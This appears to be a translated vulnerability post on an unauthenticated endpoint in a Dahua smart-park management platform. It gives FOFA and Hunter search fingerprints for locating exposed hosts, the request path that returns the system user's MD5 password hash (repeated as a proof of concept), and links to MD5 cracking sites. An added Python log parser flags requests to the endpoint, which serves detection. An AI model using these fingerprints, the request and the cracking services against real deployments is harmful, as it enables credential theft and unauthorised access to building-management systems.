banner

FOFA: app="dahua-智慧园区综合管理平台"
Hunter (鹰图) fingerprint: web.body="/WPMS/asset/lib/gridster/"

Request path:
/admin/user_getUserInfoByUserName.action?userName=system

Response: if the response data contains the MD5 password hash of the system user, the vulnerability is present.
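To find out whether this path has already been requested on a deployment, the web access logs can be searched for it. The following is an added example, not part of the original post: it assumes the platform, or a reverse proxy in front of it, writes common/combined-format access logs, and `find_probes` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint named on this page; compared case-insensitively after URL-decoding.
ENDPOINT = "/admin/user_getuserinfobyusername.action"

# Assumed log layout: ip - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def find_probes(lines):
    """Return one dict per logged request that reached the user-info endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        parts = urlsplit(m["target"])
        # Decode %xx escapes and drop ;jsessionid-style path parameters.
        path = unquote(parts.path).split(";", 1)[0].lower()
        if path != ENDPOINT:
            continue
        # Parameter names are matched case-insensitively; blank values are kept.
        query = parse_qs(parts.query, keep_blank_values=True)
        params = {k.lower(): v for k, v in query.items()}
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "user": params.get("username", [""])[0],
            # A 200 means the endpoint answered and may have returned the hash.
            "answered": m["status"] == "200",
        })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0800] "GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Jan/2024:10:05:00 +0800] "GET /admin/user_getUserInfoByUserName%2Eaction?username=admin HTTP/1.1" 302 0',
    '192.0.2.10 - - [01/Jan/2024:10:06:00 +0800] "GET /WPMS/asset/lib/gridster/jquery.gridster.js HTTP/1.1" 200 30114',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

Any hit with `answered` set to true is a reason to treat that account's password as exposed and rotate it.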

POC1:
/admin/user_getUserInfoByUserName.action?userName=system

POC2:
Detection script:


MD5 hash lookup platforms:

Free: https://www.somd5.com/
May charge a fee: https://www.cmd5.com/